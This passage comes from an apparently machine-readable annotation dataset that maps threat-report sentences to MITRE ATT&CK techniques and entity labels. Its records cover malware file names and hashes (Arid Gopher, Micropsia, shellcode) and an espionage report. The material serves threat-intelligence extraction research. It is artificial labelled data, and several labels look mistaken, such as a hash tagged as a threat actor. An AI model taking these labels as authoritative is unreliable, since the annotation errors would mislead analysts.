related to main.collectNet \"smr\" | Perhaps related to main.updateSettings 0fb4d09a29b9ca50bc98cb1f0d23bfc21cb1ab602050ce786c86bd2bb6050311 | networkvirtualizationservice.exe | Arid Gopher 3d649b84df687da1429c2214d6f271cc9c026eb4a248254b9bfd438f4973e529 | networkvirtualizationpicservice.exe | Arid Gopher 82f734f2b1ccc44a93b8f787f5c9b4eca09efd9e8dcd90c80ab355a496208fe4", "sentence_text": "| networkvirtualizationfiaservice.exe | Arid Gopher 85b083b431c6dab2dd4d6484fe0749ab4acba50842591292fdb40e14ce19d097 | networkvirtualizationinithservice.exe", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "lists a malware file and a hash for Arid Gopher malware", "entities": [ { "text": "networkvirtualizationfiaservice.exe ", "start": 2, "end": 38, "label": "MalwareTool" }, { "text": "Arid Gopher", "start": 40, "end": 51, "label": "MalwareTool" }, { "text": "networkvirtualizationinithservice.exe", "start": 119, "end": 156, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s61-cef533", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "| networkvirtualizationfiaservice.exe | Arid Gopher 85b083b431c6dab2dd4d6484fe0749ab4acba50842591292fdb40e14ce19d097 | networkvirtualizationinithservice.exe", "sentence_text": "| Arid Gopher cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341 | networkvirtualizationfiaservice.exe | Arid Gopher f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "lists malware files and hashes for Arid Gopher malware", "entities": [ { "text": "Arid Gopher", "start": 119, "end": 130, "label": "MalwareTool" }, { "text": "networkvirtualizationfiaservice.exe", "start": 81, "end": 116, "label": "MalwareTool" }, { "text": "f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8", "start": 131, "end": 195, "label": "MalwareTool" }, { "text": "cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341 ", "start": 14, "end": 79, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s62-a639aa", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "| Arid Gopher cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341 | networkvirtualizationfiaservice.exe | Arid Gopher f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8", "sentence_text": "| networkvirtualizationstartservice.exe | Arid Gopher 21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8 | AttestationWmiProvider.exe", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "lists a malware file and a hash for Arid Gopher malware", "entities": [ { "text": " networkvirtualizationstartservice.exe ", "start": 1, "end": 40, "label": "MalwareTool" }, { "text": "Arid Gopher", "start": 42, "end": 53, "label": "MalwareTool" }, { "text": "21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8 ", "start": 54, "end": 119, "label": "MalwareTool" }, { "text": "AttestationWmiProvider.exe", "start": 121, "end": 147, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s63-2df69c", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "| networkvirtualizationstartservice.exe | Arid Gopher 21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8 | AttestationWmiProvider.exe", "sentence_text": "| Arid Gopher persistence component 58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "lists a hash for Arid gopher malware persistence component", "entities": [ { "text": "Arid Gopher ", "start": 2, "end": 14, "label": "MalwareTool" }, { "text": "persistence component", "start": 14, "end": 35, "label": "MalwareTool" }, { "text": "58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724", "start": 36, "end": 100, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s64-52f1d9", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 64, "context_before": "| Arid Gopher persistence component 58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724", "sentence_text": "| windowsupserv.exe | Exfiltration tool 5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e | windowsupserv.exe | Exfiltration tool 0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038 | Various | Micropsia 1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa | N/A | Micropsia 211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d | xboxaccessorymanagementservice.exe", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "lists files, hashes, and tool names for exfiltration tool and micropsia malware component", "entities": [ { "text": "windowsupserv.exe", "start": 2, "end": 19, "label": "MalwareTool" }, { "text": "Exfiltration tool", "start": 22, "end": 39, "label": "MalwareTool" }, { "text": "5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e ", "start": 40, "end": 105, "label": "MalwareTool" }, { "text": "windowsupserv.exe", "start": 107, "end": 124, "label": "MalwareTool" }, { "text": "Exfiltration tool", "start": 127, "end": 144, "label": "MalwareTool" }, { "text": "0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038 ", "start": 145, "end": 210, "label": "MalwareTool" }, { "text": "Micropsia", "start": 222, "end": 231, "label": "MalwareTool" }, { "text": "1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa ", "start": 232, "end": 297, "label": "MalwareTool" }, { "text": "Micropsia", "start": 305, "end": 314, "label": "MalwareTool" }, { "text": "211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d ", "start": 315, "end": 380, "label": "MalwareTool" }, { "text": "xboxaccessorymanagementservice.exe", "start": 382, "end": 416, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s65-e5cfd7", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "| windowsupserv.exe | Exfiltration tool 5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e | windowsupserv.exe | Exfiltration tool 0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038 | Various | Micropsia 1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa | N/A | Micropsia 211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d | xboxaccessorymanagementservice.exe", "sentence_text": "| Micropsia d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798 | systempropertiesinternationaltime.exe | Micropsia 5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "This sentence lists file names, hashes, and malware components associated with micropsia", "entities": [ { "text": "Micropsia", "start": 2, "end": 11, "label": "MalwareTool" }, { "text": "d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798", "start": 12, "end": 76, "label": "MalwareTool" }, { "text": "systempropertiesinternationaltime.exe", "start": 79, "end": 116, "label": "MalwareTool" }, { "text": "Micropsia", "start": 119, "end": 128, "label": "MalwareTool" }, { "text": "5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4", "start": 129, "end": 193, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s66-fc9b7c", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "| Micropsia d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798 | systempropertiesinternationaltime.exe | Micropsia 5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4", "sentence_text": "| networkvirtualizationseoservice.exe | Possible Arid Gopher f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "list component file and hash for possible Arid Gopher malware", "entities": [ { "text": "networkvirtualizationseoservice.exe ", "start": 2, "end": 38, "label": "MalwareTool" }, { "text": "Possible Arid Gopher", "start": 40, "end": 60, "label": "MalwareTool" }, { "text": "f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203", "start": 61, "end": 125, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s67-38d5b0", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 67, "context_before": "| networkvirtualizationseoservice.exe | Possible Arid Gopher f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203", "sentence_text": "| runme.exe | Possible Meterpreter c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "lists component file and hash for possible Meterpreter tool", "entities": [ { "text": "runme.exe", "start": 2, "end": 11, "label": "MalwareTool" }, { "text": "Possible Meterpreter", "start": 14, "end": 34, "label": "MalwareTool" }, { "text": "c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b", "start": 35, "end": 99, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s68-6f4eea", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 68, "context_before": "| runme.exe | Possible Meterpreter c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b", "sentence_text": "| systempropertiesinternationaltime.exe | Possible Micropsia f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb | windowsservicemanageav.exe | ReverseSocksTunnel", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "files, hashes, and tool names for micropsia and reverseSocksTunnel components", "entities": [ { "text": "systempropertiesinternationaltime.exe ", "start": 2, "end": 40, "label": "MalwareTool" }, { "text": "Possible Micropsia", "start": 42, "end": 60, "label": "MalwareTool" }, { "text": "f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb ", "start": 61, "end": 126, "label": "MalwareTool" }, { "text": "windowsservicemanageav.exe", "start": 128, "end": 154, "label": "MalwareTool" }, { "text": "ReverseSocksTunnel", "start": 157, "end": 175, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s69-9f7ae7", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 69, "context_before": "| systempropertiesinternationaltime.exe | Possible Micropsia f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb | windowsservicemanageav.exe | ReverseSocksTunnel", "sentence_text": "411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299 | N/A | Shellcode 5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "Lists hashes for ShellCode component", "entities": [ { "text": "Shellcode", "start": 73, "end": 82, "label": "MalwareTool" }, { "text": "411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299", "start": 0, "end": 64, "label": "MalwareTool" }, { "text": "5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d", "start": 83, "end": 147, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s70-b13748", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 70, "context_before": "411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299 | N/A | Shellcode 5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d", "sentence_text": "| N/A | Shellcode 6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061 |", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "lists hash for Shellcode component", "entities": [ { "text": "Shellcode", "start": 8, "end": 17, "label": "MalwareTool" }, { "text": "6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061 ", "start": 18, "end": 83, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s71-afc5f1", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 71, "context_before": "| N/A | Shellcode 6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061 |", "sentence_text": "N/A | Shellcode 11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "lists hash for Shellcode component", "entities": [ { "text": "Shellcode ", "start": 6, "end": 16, "label": "MalwareTool" }, { "text": "11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e", "start": 16, "end": 80, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s72-501465", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 72, "context_before": "N/A | Shellcode 11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e", "sentence_text": "| SystemPropertiesInternationalTime.rar", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "lists malicious compressed file", "entities": [ { "text": "SystemPropertiesInternationalTime.rar", "start": 2, "end": 39, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s73-79e4c4", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 73, "context_before": "| SystemPropertiesInternationalTime.rar", "sentence_text": "| Unknown file 1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6 | networkswitcherdatamodell.exe | Unknown file 220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c | hostupbroker.exe | Unknown file 4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f | hostupbroker.exe | Unknown file 4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02 | windowspackages.exe | Unknown file 624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689 | _pytransform.dll", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "lists files, hashes, and tool names for multiple unknown malware components", "entities": [ { "text": "1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6", "start": 15, "end": 79, "label": "MalwareTool" }, { "text": "networkswitcherdatamodell.exe", "start": 82, "end": 111, "label": "MalwareTool" }, { "text": "220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c ", "start": 127, "end": 192, "label": "MalwareTool" }, { "text": "hostupbroker.exe", "start": 194, "end": 210, "label": "MalwareTool" }, { "text": "4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f", "start": 226, "end": 290, "label": "MalwareTool" }, { "text": "hostupbroker.exe", "start": 293, "end": 309, "label": "MalwareTool" }, { "text": "4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02 ", "start": 325, "end": 390, "label": "MalwareTool" }, { "text": "windowspackages.exe", "start": 392, "end": 411, "label": "MalwareTool" }, { "text": "624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689", "start": 427, "end": 491, "label": "MalwareTool" }, { "text": "_pytransform.dll", "start": 494, "end": 510, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s74-df7c50", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 74, "context_before": "| Unknown file 1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6 | networkswitcherdatamodell.exe | Unknown file 220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c | hostupbroker.exe | Unknown file 4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f | hostupbroker.exe | Unknown file 4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02 | windowspackages.exe | Unknown file 624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689 | _pytransform.dll", "sentence_text": "| Unknown file 7ae97402ec6d973f6fb0743b47a24254aaa94978806d968455d919ee979c6bb4 | embededmodeservice.exe | Unknown file 8d1c7d1de4cb42aa5dee3c98c3ac637aebfb0d6220d406145e6dc459a4c741b2 | localsecuritypolicy.exe", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-81_mitre_report-p1-s75-0406e7", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 75, "context_before": "| Unknown file 7ae97402ec6d973f6fb0743b47a24254aaa94978806d968455d919ee979c6bb4 | embededmodeservice.exe | Unknown file 8d1c7d1de4cb42aa5dee3c98c3ac637aebfb0d6220d406145e6dc459a4c741b2 | localsecuritypolicy.exe", "sentence_text": "| Unknown file b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3 | embededmodeservice.exe | Unknown file bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51 | localsecuritypolicy.exe |", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "lists files and hashes for multiple unknown malware components", "entities": [ { "text": "b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3 ", "start": 15, "end": 80, "label": "MalwareTool" }, { "text": "embededmodeservice.exe", "start": 82, "end": 104, "label": "MalwareTool" }, { "text": "bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51", "start": 120, "end": 184, "label": "MalwareTool" }, { "text": "localsecuritypolicy.exe ", "start": 187, "end": 211, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s76-647e34", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 76, "context_before": "| Unknown file b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3 | embededmodeservice.exe | Unknown file bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51 | localsecuritypolicy.exe |", "sentence_text": "Unknown file bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9 | networkuefidiagsbootserver.exe | Unknown file d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842 | teamviewrremoteservice.exe", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "lists files and hashes for multiple unknown malware components", "entities": [ { "text": "networkuefidiagsbootserver.exe", "start": 80, "end": 110, "label": "MalwareTool" }, { "text": "teamviewrremoteservice.exe", "start": 193, "end": 219, "label": "MalwareTool" }, { "text": "bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9", "start": 13, "end": 77, "label": "ThreatActor" }, { "text": "d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842", "start": 126, "end": 190, "label": "MalwareTool" } ] }, { "uid": "mitre-81_mitre_report-p1-s77-4d14e2", "source": "mitre", "doc_id": "81_mitre_report", "page_number": 1, "sentence_id": 77, "context_before": "Unknown file bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9 | networkuefidiagsbootserver.exe | Unknown file d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842 | teamviewrremoteservice.exe", "sentence_text": "| Unknown file", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p2-s1-158211", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 2, "sentence_id": 1, "context_before": "", "sentence_text": "TABLE OF CONTENTS Purpose of this report 3 Summary of our findings 3 01 Removing three cyber-espionage networks from Iran and Azerbaijan 5 02 Ukraine security update 9 03 Removing four networks for coordinated inauthentic behavior 12 04 Removing a mass reporting network in Russia 17 05 Removing a coordinated violating network in the Philippines 18 06 Removing inauthentic behavior 20 Appendix: Threat indicators 24 ADVERSARIAL THREAT REPORT 2", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p3-s2-983cd0", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 3, "sentence_id": 2, "context_before": "TABLE OF CONTENTS Purpose of this report 3 Summary of our findings 3 01 Removing three cyber-espionage networks from Iran and Azerbaijan 5 02 Ukraine security update 9 03 Removing four networks for coordinated inauthentic behavior 12 04 Removing a mass reporting network in Russia 17 05 Removing a coordinated violating network in the Philippines 18 06 Removing inauthentic behavior 20 Appendix: Threat indicators 24 ADVERSARIAL THREAT REPORT 2", "sentence_text": "PURPOSE OF THIS REPORT Our public security reporting began over four years ago when we first shared our findings about coordinated inauthentic behavior (CIB) by the Russian Internet Research Agency.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p3-s3-bb3957", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 3, "sentence_id": 3, "context_before": "PURPOSE OF THIS REPORT Our public security reporting began over four years ago when we first shared our findings about coordinated inauthentic behavior (CIB) by the Russian Internet Research Agency.", "sentence_text": "We’re also sharing threat indicators at the end of this report to contribute to the efforts by the security community to detect and counter malicious activity elsewhere on the internet (See Appendix).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p3-s4-f81f64", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 3, "sentence_id": 4, "context_before": "We’re also sharing threat indicators at the end of this report to contribute to the efforts by the security community to detect and counter malicious activity elsewhere on the internet (See Appendix).", "sentence_text": "We welcome ideas from the security community to help us make these reports more informative and we’ll adjust as we learn from feedback.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p3-s5-aead3a", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 3, "sentence_id": 5, "context_before": "We welcome ideas from the security community to help us make these reports more informative and we’ll adjust as we learn from feedback.", "sentence_text": "● We took action against two cyber espionage operations from Iran.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p3-s6-5de254", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 3, "sentence_id": 6, "context_before": "● We took action against two cyber espionage operations from Iran.", "sentence_text": "The first network was linked to a group of hackers known in the security industry as UNC788.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p3-s7-7b0219", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 3, "sentence_id": 7, "context_before": "The first network was linked to a group of hackers known in the security industry as UNC788.", "sentence_text": "More here.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p3-s8-4606ff", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 3, "sentence_id": 8, "context_before": "More here.", "sentence_text": "● We removed a hybrid network operated by the Ministry of Internal Affairs of Azerbaijan that combined cyber espionage with Coordinated Inauthentic Behavior (CIB) to target civil society in Azerbaijan by compromising accounts and websites to post on their behalf.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078.003", "name": "Local Accounts" } ], "procedure": "compromised accounts and websites to post on behalf of civil society", "entities": [ { "text": "Ministry of Internal Affairs of Azerbaijan", "start": 46, "end": 88, "label": "ThreatActor" }, { "text": "compromising accounts and websites", "start": 204, "end": 238, "label": "Action" }, { "text": "post on their behalf", "start": 242, "end": 262, "label": "Action" }, { "text": "cyber espionage", "start": 103, "end": 118, "label": "Action" } ] }, { "uid": "mitre-82_mitre_report-p3-s11-7b3244", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 3, "sentence_id": 11, "context_before": "More here.", "sentence_text": "The Brazilian network is the first operation we’ve disrupted that primarily focused on environmental issues.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p3-s12-d19962", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 3, "sentence_id": 12, "context_before": "The Brazilian network is the first operation we’ve disrupted that primarily focused on environmental issues.", "sentence_text": "More here.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p3-s13-864daf", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 3, "sentence_id": 13, "context_before": "More here.", "sentence_text": "ADVERSARIAL THREAT REPORT 3", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p4-s14-65da27", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 4, "sentence_id": 14, "context_before": "ADVERSARIAL THREAT REPORT 3", "sentence_text": "More here.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p4-s16-c95ba6", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 4, "sentence_id": 16, "context_before": "More here.", "sentence_text": "We did so through large-scale automated detection, complemented by manual investigations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p4-s17-03c5a1", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 4, "sentence_id": 17, "context_before": "We did so through large-scale automated detection, complemented by manual investigations.", "sentence_text": "More here.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p4-s18-b0d70a", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 4, "sentence_id": 18, "context_before": "More here.", "sentence_text": "ADVERSARIAL THREAT REPORT 4", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p5-s19-e4fec7", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 5, "sentence_id": 19, "context_before": "ADVERSARIAL THREAT REPORT 4", "sentence_text": "We have included threat indicators in the Appendix to this report.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p5-s20-8e5963", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 5, "sentence_id": 20, "context_before": "We have included threat indicators in the Appendix to this report.", "sentence_text": "Their malicious activity had the hallmarks of a well-resourced and persistent operation while obfuscating who’s behind it.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p5-s21-4d5ff2", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 5, "sentence_id": 21, "context_before": "Their malicious activity had the hallmarks of a well-resourced and persistent operation while obfuscating who’s behind it.", "sentence_text": "We’ve been tracking and blocking this group’s efforts for a number of years, similar to our peers at other platforms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-82_mitre_report-p5-s22-e201d5", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 5, "sentence_id": 22, "context_before": "We’ve been tracking and blocking this group’s efforts for a number of years, similar to our peers at other platforms.", "sentence_text": "This latest cyber espionage campaign was active across the broader internet and focused on phishing its targets to steal credentials to their online accounts and sharing links to malicious websites hosting malware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "used phishing to steal credentials, also shared links to malicious websites hosting malware", "entities": [ { "text": "malicious websites", "start": 179, "end": 197, "label": "Infrastructure_Indicator" }, { "text": "phishing its targets", "start": 91, "end": 111, "label": "Action" }, { "text": "steal credentials", "start": 115, "end": 132, "label": "Action" }, { "text": "sharing links to malicious websites", "start": 162, "end": 197, "label": "Action" }, { "text": "malware", "start": 206, "end": 213, "label": "MalwareTool" } ] }, { "uid": "mitre-82_mitre_report-p6-s23-df545d", "source": "mitre", "doc_id": "82_mitre_report", "page_number": 6, "sentence_id": 23, "context_before": "This latest cyber espionage campaign was active across the broader internet and focused on phishing its targets to steal credentials to their online accounts and sharing links to malicious websites hosting malware.", "sentence_text": "● Social engineering: This group used a combination of low-sophistication fake accounts and more elaborate fictitious personas, which they likely used to build trust with potential targets and trick them into clicking on phishing links or downloading malicious applications.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { 